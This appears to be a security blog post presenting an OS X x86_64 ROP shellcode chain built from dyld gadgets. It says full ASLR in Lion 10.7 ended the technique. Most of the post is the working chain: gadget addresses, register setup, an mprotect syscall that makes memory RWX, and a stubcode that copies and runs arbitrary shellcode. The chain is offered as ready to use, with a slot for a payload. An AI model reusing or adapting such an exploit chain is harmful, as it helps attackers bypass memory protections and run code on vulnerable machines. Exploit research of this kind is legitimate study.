This technique was killed by OSX Lion 10.7 with full ASLR. @pa_kt has posted an Universal ROP shellcode for OS X x64 with detail steps and explanation. If you don’t have a chance to read above post, the basic ideas are:

  • Copy stubcode to a writable area (.data section)
  • Make that area RWX
  • Jump to RWX area and execute stubcode
  • Stubcode will transfer normal shellcode to RWX area and execute it
  • All the ROP gadgets are from dyld module which is not randomized

In this post, we shows another OSX x86_64 dyld ROP shellcode which is more simple. We employ the same ideas with some minor differences in implementation:

  • Instead of using long gadgets with “leave”, we use direct, short gadgets from unintended code
  • Calling mprotect() via syscall
  • Short stubcode (7 bytes) using memcpy() to transfer payload

Here is the ROP shellcode with explanation:

# store [target], stubcode
0x00007fff5fc0e7ee # pop rsi ; adc al 0x83
0xc353575e545a5b90 # => rsi = stubcode
0x00007fff5fc24cdc # pop rdi
0x00007fff5fc74f80 # => rdi
0x00007fff5fc24d26 # mov [rdi+0x80] rsi; stubcode => [target]
# load rdx, 0x7 (prot RWX)
0x00007fff5fc24cdc # pop rdi
0x00007fff5fc75001 # => rdi
0x00007fff5fc1ddc0 # lea rax, [rdi-0x1]
0x00007fff5fc219c3 # pop rbp ; add [rax] al ; add cl cl
0x00007fff5fc75000 # => rbp
0x00007fff5fc0e7ee # pop rsi ; adc al 0x83
0x0000000000000007 # => rsi
0x00007fff5fc14149 # mov edx esi ; add [rax] al ; add [rbp+0x39] cl => rdx = 0x7
# load rsi, 4096 (size)
0x00007fff5fc0e7ee # pop rsi ; adc al 0x83
0x0000000000001000 # => rsi = 4096
# load rax, mprotect_syscal
0x00007fff5fc24cdc # pop rdi
0x000000000200004b # => rdi
0x00007fff5fc1ddc0 # lea rax, [rdi-0x1] => rax = 0x200004a (mprotect syscall)
# load rdi, target
0x00007fff5fc24cdc # pop rdi
0x00007fff5fc75000 # => rdi = target
# syscall
0x00007fff5fc1c76d # mov r10, rcx; syscall  => mprotect(target, 4096, 7)
0x00007fff5fc75000 # jump to target, execute stubcode
# stubcode
# 5B                pop rbx     # rbx -> memcpy()
# 5A                pop rdx     # rdx -> size
# 54                push rsp    # src -> &shellcode
# 5E                pop rsi     # src -> &shellcode
# 57                push rdi    # jump to target when return from memcpy()
# 53                push rbx    # memcpy()
# C3                ret         # execute memcpy(target, &shellcode, size)
0x00007fff5fc234f0 # &memcpy()
0x0000000000000200 # shellcode size = 512
<your shellcode here>

You can verify those gadgets and find more here:

Ready to use shellcode:
